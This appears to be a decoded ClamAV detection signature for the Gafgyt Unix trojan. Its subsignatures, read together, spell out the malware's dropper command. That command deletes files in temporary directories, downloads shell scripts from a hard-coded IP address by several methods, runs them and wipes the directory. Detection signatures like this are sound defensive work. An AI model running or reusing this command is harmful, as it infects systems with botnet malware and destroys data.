VIRUS NAME: Unix.Trojan.Gafgyt-9441518-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://167.114.85.109/jlb1.sh || wget http://16
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
7.114.85.109/jlb1.sh || busybox tftp -r jlb2.sh -g 167.114.85.109 || tftp -r jlb2.sh -g 167.114.85.109 || busybox tftp 167.114.8
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
5.109 -c get jlb3.sh || tftp 167.114.85.109 -c get jlb3.sh || busybox ftpget 167.114.85.109 jlb4.sh jlb4.sh;sh jlb1.sh || sh jlb
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
2.sh || sh jlb3.sh || sh jlb4.sh;rm -f *;exit
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
167.114.85.109
